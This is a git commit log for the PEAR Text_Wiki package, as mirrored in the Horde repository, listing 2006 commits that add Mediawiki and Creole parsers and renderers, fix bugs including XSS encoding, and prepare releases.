http://github.com/horde/horde/commit/479350d36e7cef3e82ac6d316d35b179f619662b

-----------------------------------------------------------------------

commit a83c375f5c1bfbe61bef072683a6925e168e95f4
Author: Justin Patrin 
Date:   Thu Mar 2 20:58:49 2006 +0000

    Switch to Text_Wiki error handling for factory and singleton
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208496 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/a83c375f5c1bfbe61bef072683a6925e168e95f4

-----------------------------------------------------------------------

commit 332e57c93518aa6bed0270bf96a86355f38aac0a
Author: bertrand Gugger 
Date:   Fri Mar 3 17:54:06 2006 +0000

    We just need to die if required sub package is not there
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208563 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php          | 22 ++++++----------------
 doc/test_Text_Wiki.php |  2 +-
 2 files changed, 7 insertions(+), 17 deletions(-)

http://github.com/horde/horde/commit/332e57c93518aa6bed0270bf96a86355f38aac0a

-----------------------------------------------------------------------

commit 23b641d4a5f6f87367d19f5f1270ba9e018a02a0
Author: Justin Patrin 
Date:   Sun Mar 5 06:50:13 2006 +0000

    Set $wiki->newRendering to use new experimental preg_replace_callback rendering method
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208659 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 79 ++++++++++++++++++++++++++++++++++++-----------------------
 1 file changed, 48 insertions(+), 31 deletions(-)

http://github.com/horde/horde/commit/23b641d4a5f6f87367d19f5f1270ba9e018a02a0

-----------------------------------------------------------------------

commit 25d497f614eb555a6de688f22fc76e5aa2b703ea
Author: Justin Patrin 
Date:   Sat Mar 11 07:08:53 2006 +0000

    Move encoding calls to where the HTML is created instead of before processing happens
    Remove setting of $text which broke outputting of some links
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209117 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 28 ++++++++++------------------
 1 file changed, 10 insertions(+), 18 deletions(-)

http://github.com/horde/horde/commit/25d497f614eb555a6de688f22fc76e5aa2b703ea

-----------------------------------------------------------------------

commit cabef87e4db80baad248261e7e95cfb50eac9583
Author: Justin Patrin 
Date:   Sat Mar 11 07:12:13 2006 +0000

    Added a comment
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209118 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/cabef87e4db80baad248261e7e95cfb50eac9583

-----------------------------------------------------------------------

commit 50767fb38580ebf0e57e1a62aef3e166ef2d2ff3
Author: bertrand Gugger 
Date:   Sat Mar 11 11:14:23 2006 +0000

    Variable Substitution Bug #7091 (thanks randlem at bgsu dot edu)
    Replaced all "dangerous" string syntaxes
    Map Freelink on Wikilink as in Xhtml
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209123 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Font.php      |  2 +-
 Text/Wiki/Render/Latex/Freelink.php  | 34 +++-------------------------------
 Text/Wiki/Render/Latex/Interwiki.php |  2 +-
 Text/Wiki/Render/Latex/List.php      |  5 +++--
 Text/Wiki/Render/Latex/Table.php     |  2 +-
 Text/Wiki/Render/Latex/Url.php       |  4 ++--
 Text/Wiki/Render/Latex/Wikilink.php  |  2 +-
 7 files changed, 12 insertions(+), 39 deletions(-)

http://github.com/horde/horde/commit/50767fb38580ebf0e57e1a62aef3e166ef2d2ff3

-----------------------------------------------------------------------

commit cf335bc145ce8014979dc340751e3179321fd9db
Author: Justin Patrin 
Date:   Sat Mar 11 20:07:00 2006 +0000

    urlencode the part of the anchor after #
    use $page
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209145 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/cf335bc145ce8014979dc340751e3179321fd9db

-----------------------------------------------------------------------

commit e0717e3014622bb9630bc41d1eda481763d62581
Author: Justin Patrin 
Date:   Sat Mar 11 20:14:14 2006 +0000

    textEncode css before inserting into HTML
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209146 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/e0717e3014622bb9630bc41d1eda481763d62581

-----------------------------------------------------------------------

commit 7ef766068e164eff0ce4ba14747e623ebfca3d8b
Author: Justin Patrin 
Date:   Tue Mar 14 02:18:54 2006 +0000

    Fix issues with parsing URLs in (( ))
    Fix notice
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209302 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Cowiki/Url.php | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/7ef766068e164eff0ce4ba14747e623ebfca3d8b

-----------------------------------------------------------------------

commit 80f4af00e824b0aeff0aedf4f4919630aac8299c
Author: Justin Patrin 
Date:   Tue Mar 14 02:20:05 2006 +0000

    Fix notice about undefined index page
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209303 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Doku/Url.php | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/80f4af00e824b0aeff0aedf4f4919630aac8299c

-----------------------------------------------------------------------

commit 1a0d380029aa8e49fcfaf0637c9e618ffbaeb31e
Author: Justin Patrin 
Date:   Tue Mar 14 03:45:45 2006 +0000

    Fix paragraph rendering for Dokuwiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 209311 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Doku/Paragraph.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/1a0d380029aa8e49fcfaf0637c9e618ffbaeb31e

-----------------------------------------------------------------------

commit dfb06c3e043a694f775cc86b41d4f77548ec881a
Author: Moritz Venn 
Date:   Tue Mar 28 04:46:09 2006 +0000

    Use Tikki-Wiki List-Parser for now, as it uses the same syntax.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 210281 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/List.php | 250 +++++++++++++++++++++++++++++++++++++
 1 file changed, 250 insertions(+)
 create mode 100755 Text/Wiki/Parse/Mediawiki/List.php

http://github.com/horde/horde/commit/dfb06c3e043a694f775cc86b41d4f77548ec881a

-----------------------------------------------------------------------

commit 1dc1b1066ec568275f0564d2c7cb1773c8740823
Author: Moritz Venn 
Date:   Wed Mar 29 18:41:43 2006 +0000

    First Version of a Mediawiki Deflist-Parser. Contains a few known Bugs.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 210373 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Deflist.php | 278 ++++++++++++++++++++++++++++++++++
 1 file changed, 278 insertions(+)
 create mode 100755 Text/Wiki/Parse/Mediawiki/Deflist.php

http://github.com/horde/horde/commit/1dc1b1066ec568275f0564d2c7cb1773c8740823

-----------------------------------------------------------------------

commit 1917ece24998d3c5795d7abf2f74535eb4e9789e
Author: bertrand Gugger 
Date:   Fri Apr 7 05:21:49 2006 +0000

    Prepare next release 0.1.0
    Completed changelog , added / removed files , dependence to Text_Wiki-1.1.0
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 210890 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 59 +++++++++++++++++++++++++++++++++++++++++++++-------
 1 file changed, 52 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/1917ece24998d3c5795d7abf2f74535eb4e9789e

-----------------------------------------------------------------------

commit 392b1de921e7d17460c4fe30929399833bdbb4f3
Author: bertrand Gugger 
Date:   Mon Apr 10 12:36:59 2006 +0000

    Update summary and description.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 211115 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/392b1de921e7d17460c4fe30929399833bdbb4f3

-----------------------------------------------------------------------

commit 4d4065bb90d35d7c37385ea5ea63f4d5ccee5091
Author: bertrand Gugger 
Date:   Mon Apr 10 13:40:11 2006 +0000

    We release today
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 211121 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/4d4065bb90d35d7c37385ea5ea63f4d5ccee5091

-----------------------------------------------------------------------

commit 8395d96804ed5378fedb735214016f152c13cb73
Author: bertrand Gugger 
Date:   Mon Apr 10 14:49:29 2006 +0000

    Thanks to Daniel , some better english ,
    will copy on site as we don't expect to release soon.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 211125 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/8395d96804ed5378fedb735214016f152c13cb73

-----------------------------------------------------------------------

commit bcb36648766da0de70105b52bee3f0154e5907fa
Author: bertrand Gugger 
Date:   Mon Apr 10 17:14:15 2006 +0000

    Optimists hope it's the last typo , let's go , thanks for help !
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 211139 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/bcb36648766da0de70105b52bee3f0154e5907fa

-----------------------------------------------------------------------

commit 8ffe4f0e57ce480c7f4401c6da1a99b932a85683
Author: bertrand Gugger 
Date:   Thu Apr 13 06:12:20 2006 +0000

    Ooops ! Forgot to commit Deflist addition . This is correct in the release 0.1.0
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 211299 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/8ffe4f0e57ce480c7f4401c6da1a99b932a85683

-----------------------------------------------------------------------

commit 90299aa481c417e4acf5ea2482f820ee01f5df08
Author: Moritz Venn 
Date:   Thu Apr 13 17:01:17 2006 +0000

    Correct Cell-Parsing (#7392)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 211338 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/90299aa481c417e4acf5ea2482f820ee01f5df08

-----------------------------------------------------------------------

commit f175c2a8eb0223931a5c82bed07bad22f903f833
Author: bertrand Gugger 
Date:   Sun Apr 23 10:31:56 2006 +0000

    Many thanks for the great experience.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 211883 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml          |  8 +-------
 packageBBCode.xml    |  8 +-------
 packageCowiki.xml    | 10 ++--------
 packageDoku.xml      |  8 +-------
 packageMediawiki.xml |  8 +-------
 packageTiki.xml      |  8 +-------
 6 files changed, 7 insertions(+), 43 deletions(-)

http://github.com/horde/horde/commit/f175c2a8eb0223931a5c82bed07bad22f903f833

-----------------------------------------------------------------------

commit 25a24c16fab439e521ce5ac8e26c754e7f227a3d
Author: Moritz Venn 
Date:   Thu Apr 27 18:09:15 2006 +0000

    Fix Anchor in Wikilink
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 212087 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/25a24c16fab439e521ce5ac8e26c754e7f227a3d

-----------------------------------------------------------------------

commit d930cd2fbeefc2491e28d955308d561ae0c2c133
Author: Justin Patrin 
Date:   Fri Jun 9 21:32:24 2006 +0000

    Encode text to avoid XSS
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 214538 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Raw.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/d930cd2fbeefc2491e28d955308d561ae0c2c133

-----------------------------------------------------------------------

commit 64efc1c96a35d565b5302202f93026af5a4b93bb
Author: Moritz Venn 
Date:   Tue Jul 11 08:13:09 2006 +0000

    Follow Mediawiki markup standards with single newlines (#8174, thanks Brian Sipos)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 216126 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Break.php   | 70 +++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Mediawiki/Newline.php | 77 +++++++++++++++++++++++++++++++++++
 2 files changed, 147 insertions(+)
 create mode 100755 Text/Wiki/Parse/Mediawiki/Break.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Newline.php

http://github.com/horde/horde/commit/64efc1c96a35d565b5302202f93026af5a4b93bb

-----------------------------------------------------------------------

commit dac6006de3153f559bb2215ecbdac77001d4a327
Author: Moritz Venn 
Date:   Fri Jul 14 18:04:56 2006 +0000

    Add Code- and Tt-Rule (thanks Brian)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 216384 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php            |  4 +-
 Text/Wiki/Parse/Mediawiki/Code.php | 99 ++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Mediawiki/Tt.php   | 84 ++++++++++++++++++++++++++++++++
 3 files changed, 185 insertions(+), 2 deletions(-)
 create mode 100755 Text/Wiki/Parse/Mediawiki/Code.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Tt.php

http://github.com/horde/horde/commit/dac6006de3153f559bb2215ecbdac77001d4a327

-----------------------------------------------------------------------

commit 57560c6e58f6c16a9ced239dd8c220996ca5c1ac
Author: Moritz Venn 
Date:   Fri Jul 14 18:36:57 2006 +0000

    Add Sub-/Superscript rules
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 216387 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                   |  4 +-
 Text/Wiki/Parse/Mediawiki/Subscript.php   | 67 +++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Mediawiki/Superscript.php | 67 +++++++++++++++++++++++++++++++
 3 files changed, 136 insertions(+), 2 deletions(-)
 create mode 100755 Text/Wiki/Parse/Mediawiki/Subscript.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Superscript.php

http://github.com/horde/horde/commit/57560c6e58f6c16a9ced239dd8c220996ca5c1ac

-----------------------------------------------------------------------

commit 9bb9ed98ee8c96b90aaa8227b7318ffed96bfa49
Author: Justin Patrin 
Date:   Fri Jul 28 14:52:52 2006 +0000

    Bug 8313 fix anchor output when used in conjuction with sprintf (thanks to bjs5075 at rit dot edu)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 217229 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/9bb9ed98ee8c96b90aaa8227b7318ffed96bfa49

-----------------------------------------------------------------------

commit 6a71fc510c0ef59e2dbeb352c66a7b4fb935ad97
Author: Moritz Venn 
Date:   Sat Jul 29 21:55:29 2006 +0000

    Lists can now skip levels up AND down
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 217260 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/List.php | 33 ++++++++++++++++++++++++---------
 1 file changed, 24 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/6a71fc510c0ef59e2dbeb352c66a7b4fb935ad97

-----------------------------------------------------------------------

commit 94ec1db21819e62d95d7496d0dd1cf7f0169aac2
Author: Moritz Venn 
Date:   Tue Aug 15 15:07:16 2006 +0000

    Fix Bug #8402 (thanks brian)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 218235 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/94ec1db21819e62d95d7496d0dd1cf7f0169aac2

-----------------------------------------------------------------------

commit f1239968371e069b5545ae0066027e4406827fa5
Author: Moritz Venn 
Date:   Tue Aug 15 15:27:17 2006 +0000

    Fix Bug #8449 (thanks brian)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 218239 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/f1239968371e069b5545ae0066027e4406827fa5

-----------------------------------------------------------------------

commit c068c269f3ea08e4dd0060f3a58577cbdc5a2eb1
Author: Moritz Venn 
Date:   Tue Aug 15 16:02:06 2006 +0000

    Fixed Headers, Added Preformatted rule (used Brian's syntax for this one) and fixed resulting Bug #8448
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 218241 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                    |   2 +-
 Text/Wiki/Parse/Mediawiki/Break.php        |  67 +++++++--------
 Text/Wiki/Parse/Mediawiki/Code.php         |  74 +++++++----------
 Text/Wiki/Parse/Mediawiki/Deflist.php      |  16 ----
 Text/Wiki/Parse/Mediawiki/Heading.php      |  77 +++++++----------
 Text/Wiki/Parse/Mediawiki/List.php         |  85 ++++++++-----------
 Text/Wiki/Parse/Mediawiki/Newline.php      |  74 +++++++----------
 Text/Wiki/Parse/Mediawiki/Preformatted.php |  62 ++++++++++++++
 Text/Wiki/Parse/Mediawiki/Raw.php          |  68 +++++++--------
 Text/Wiki/Parse/Mediawiki/Subscript.php    |  50 ++++++-----
 Text/Wiki/Parse/Mediawiki/Superscript.php  |  50 ++++++-----
 Text/Wiki/Parse/Mediawiki/Tt.php           |  79 ++++++++----------
 Text/Wiki/Parse/Mediawiki/Url.php          | 129 +++++++++++------------------
 13 files changed, 372 insertions(+), 461 deletions(-)
 create mode 100755 Text/Wiki/Parse/Mediawiki/Preformatted.php

http://github.com/horde/horde/commit/c068c269f3ea08e4dd0060f3a58577cbdc5a2eb1

-----------------------------------------------------------------------

commit 49b1c20490f26decc17f4c303498908f7398d67e
Author: Moritz Venn 
Date:   Fri Aug 18 11:37:04 2006 +0000

    Fix Bug #8496 (thanks Brian)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 218410 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/49b1c20490f26decc17f4c303498908f7398d67e

-----------------------------------------------------------------------

commit 8648c5a819f7f9e1b019560db9328a8699f625da
Author: Moritz Venn 
Date:   Fri Aug 18 12:11:46 2006 +0000

    Implemented Request #8451 (thanks Brian)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 218413 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Deflist.php | 44 +++++++++++++++++++++++++++++------
 1 file changed, 37 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/8648c5a819f7f9e1b019560db9328a8699f625da

-----------------------------------------------------------------------

commit 3d8e58f7acf3df4d089f7ded4401e6ecc8d3057e
Author: Moritz Venn 
Date:   Fri Aug 18 13:25:02 2006 +0000

    Fix Bug #8501 (thanks Brian)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 218426 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Subscript.php   | 2 +-
 Text/Wiki/Parse/Mediawiki/Superscript.php | 2 +-
 Text/Wiki/Parse/Mediawiki/Tt.php          | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/3d8e58f7acf3df4d089f7ded4401e6ecc8d3057e

-----------------------------------------------------------------------

commit 394ebf9befb7f536b3389af49c19bc7f15f7971c
Author: Moritz Venn 
Date:   Fri Aug 18 14:51:57 2006 +0000

    Fix Bug #8505 (thanks Brian)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 218431 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Code.php | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

http://github.com/horde/horde/commit/394ebf9befb7f536b3389af49c19bc7f15f7971c

-----------------------------------------------------------------------

commit 18a032e10a6ad32ca34c6d0d21492d4a8127ba9b
Author: Justin Patrin 
Date:   Tue Oct 10 19:34:38 2006 +0000

    Set up a configuration variable (temporarily) to switch renderer algorithms
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 221509 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/18a032e10a6ad32ca34c6d0d21492d4a8127ba9b

-----------------------------------------------------------------------

commit c99dc8f09b51faf6b6844bc52e7dd6aaecade172
Author: Justin Patrin 
Date:   Tue Oct 10 19:36:17 2006 +0000

    Prepare for 1.2.0RC1 release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 221512 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 92 +++++++++++++++++++++++++++++++++++++------------------------
 1 file changed, 56 insertions(+), 36 deletions(-)

http://github.com/horde/horde/commit/c99dc8f09b51faf6b6844bc52e7dd6aaecade172

-----------------------------------------------------------------------

commit 3b05c2207e2a3241688a6a949b2dc686fc35beda
Author: Justin Patrin 
Date:   Tue Oct 10 19:38:44 2006 +0000

    Adding package2.xml, fixing multi-line summary
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 221515 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml  |   5 +-
 package2.xml | 405 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 407 insertions(+), 3 deletions(-)
 create mode 100644 package2.xml

http://github.com/horde/horde/commit/3b05c2207e2a3241688a6a949b2dc686fc35beda

-----------------------------------------------------------------------

commit 4b50ba1047ec7f6f9031a007bf82b848d328ce96
Author: Justin Patrin 
Date:   Sat Oct 21 05:56:28 2006 +0000

    Add a stack-based rendering callback system which allows for renderers to easily alter the text between start and end tokens (such as for Blockquote wiki-format output)
    Fix Blockquote parse algorithm
    - use an int instead of a stack of "true"
    - Blockquote always puts newlines back where they came from and *no longer adds any new ones*
    - Fix levels of Blockquotes (they weren't working at all before)
    Fix rendering of Blockquote for Doku renderer using new render callbacks
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222150 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                          | 107 ++++++++++++++++++++++++++++++---
 Text/Wiki/Parse/Default/Blockquote.php |  53 ++++++++--------
 Text/Wiki/Parse/Doku/Blockquote.php    |  54 ++++++++---------
 Text/Wiki/Render/Doku/Blockquote.php   |  14 +++--
 4 files changed, 161 insertions(+), 67 deletions(-)

http://github.com/horde/horde/commit/4b50ba1047ec7f6f9031a007bf82b848d328ce96

-----------------------------------------------------------------------

commit 93a6c67fe70b090f43d4a1e4c2f9c426cbb8b50c
Author: Justin Patrin 
Date:   Sat Oct 21 19:34:07 2006 +0000

    Adding the first test
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222193 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Default_Parse_BlockQuote.phpt | 73 +++++++++++++++++++++++++++++++++++++
 tests/config.php.dist               |  5 +++
 2 files changed, 78 insertions(+)
 create mode 100644 tests/Default_Parse_BlockQuote.phpt
 create mode 100644 tests/config.php.dist

http://github.com/horde/horde/commit/93a6c67fe70b090f43d4a1e4c2f9c426cbb8b50c

-----------------------------------------------------------------------

commit d8bcd3477eef4540e1945c13bd27110602367f81
Author: Michele Tomaiuolo 
Date:   Mon Oct 23 13:11:27 2006 +0000

    First commit of Text_Wiki_Creole - parser and renderer. Fingers crossed :-)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222265 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php                     | 109 +++++++++++
 Text/Wiki/Parse/Creole/Address.php       |  67 +++++++
 Text/Wiki/Parse/Creole/Blockquote.php    | 173 +++++++++++++++++
 Text/Wiki/Parse/Creole/Delimiter.php     |  68 +++++++
 Text/Wiki/Parse/Creole/Emphasis.php      |  75 ++++++++
 Text/Wiki/Parse/Creole/Heading.php       |  97 ++++++++++
 Text/Wiki/Parse/Creole/Horiz.php         |  58 ++++++
 Text/Wiki/Parse/Creole/Image.php         |  66 +++++++
 Text/Wiki/Parse/Creole/List.php          | 238 +++++++++++++++++++++++
 Text/Wiki/Parse/Creole/Newline.php       |  60 ++++++
 Text/Wiki/Parse/Creole/Paragraph.php     | 137 +++++++++++++
 Text/Wiki/Parse/Creole/Prefilter.php     |  54 ++++++
 Text/Wiki/Parse/Creole/Preformatted.php  |  61 ++++++
 Text/Wiki/Parse/Creole/Strong.php        |  80 ++++++++
 Text/Wiki/Parse/Creole/Table.php         | 189 ++++++++++++++++++
 Text/Wiki/Parse/Creole/Tighten.php       |  37 ++++
 Text/Wiki/Parse/Creole/Trim.php          |  45 +++++
 Text/Wiki/Parse/Creole/Tt.php            |  73 +++++++
 Text/Wiki/Parse/Creole/Url.php           | 102 ++++++++++
 Text/Wiki/Parse/Creole/Wikilink.php      | 320 +++++++++++++++++++++++++++++++
 Text/Wiki/Render/Creole.php              |  16 ++
 Text/Wiki/Render/Creole/Address.php      |  29 +++
 Text/Wiki/Render/Creole/Anchor.php       |  23 +++
 Text/Wiki/Render/Creole/Blockquote.php   |  35 ++++
 Text/Wiki/Render/Creole/Bold.php         |  23 +++
 Text/Wiki/Render/Creole/Box.php          |  30 +++
 Text/Wiki/Render/Creole/Break.php        |  24 +++
 Text/Wiki/Render/Creole/Center.php       |  30 +++
 Text/Wiki/Render/Creole/Code.php         |  23 +++
 Text/Wiki/Render/Creole/Colortext.php    |  23 +++
 Text/Wiki/Render/Creole/Deflist.php      |  23 +++
 Text/Wiki/Render/Creole/Delimiter.php    |  23 +++
 Text/Wiki/Render/Creole/Embed.php        |  29 +++
 Text/Wiki/Render/Creole/Emphasis.php     |  23 +++
 Text/Wiki/Render/Creole/Freelink.php     |   9 +
 Text/Wiki/Render/Creole/Function.php     |  23 +++
 Text/Wiki/Render/Creole/Heading.php      |  11 ++
 Text/Wiki/Render/Creole/Horiz.php        |  23 +++
 Text/Wiki/Render/Creole/Html.php         |  23 +++
 Text/Wiki/Render/Creole/Image.php        |  26 +++
 Text/Wiki/Render/Creole/Include.php      |  16 ++
 Text/Wiki/Render/Creole/Interwiki.php    |  23 +++
 Text/Wiki/Render/Creole/Italic.php       |  23 +++
 Text/Wiki/Render/Creole/List.php         |  53 +++++
 Text/Wiki/Render/Creole/Newline.php      |  12 ++
 Text/Wiki/Render/Creole/Paragraph.php    |  29 +++
 Text/Wiki/Render/Creole/Phplookup.php    |  25 +++
 Text/Wiki/Render/Creole/Prefilter.php    |  10 +
 Text/Wiki/Render/Creole/Preformatted.php |  23 +++
 Text/Wiki/Render/Creole/Raw.php          |  23 +++
 Text/Wiki/Render/Creole/Revise.php       |  23 +++
 Text/Wiki/Render/Creole/Strong.php       |  23 +++
 Text/Wiki/Render/Creole/Subscript.php    |  23 +++
 Text/Wiki/Render/Creole/Superscript.php  |  23 +++
 Text/Wiki/Render/Creole/Table.php        |  62 ++++++
 Text/Wiki/Render/Creole/Tighten.php      |  10 +
 Text/Wiki/Render/Creole/Toc.php          |  23 +++
 Text/Wiki/Render/Creole/Tt.php           |  29 +++
 Text/Wiki/Render/Creole/Underline.php    |  23 +++
 Text/Wiki/Render/Creole/Url.php          |  39 ++++
 Text/Wiki/Render/Creole/Wikilink.php     |  29 +++
 packageCreole.xml                        |  93 +++++++++
 62 files changed, 3215 insertions(+)
 create mode 100644 Text/Wiki/Creole.php
 create mode 100644 Text/Wiki/Parse/Creole/Address.php
 create mode 100644 Text/Wiki/Parse/Creole/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Creole/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Creole/Emphasis.php
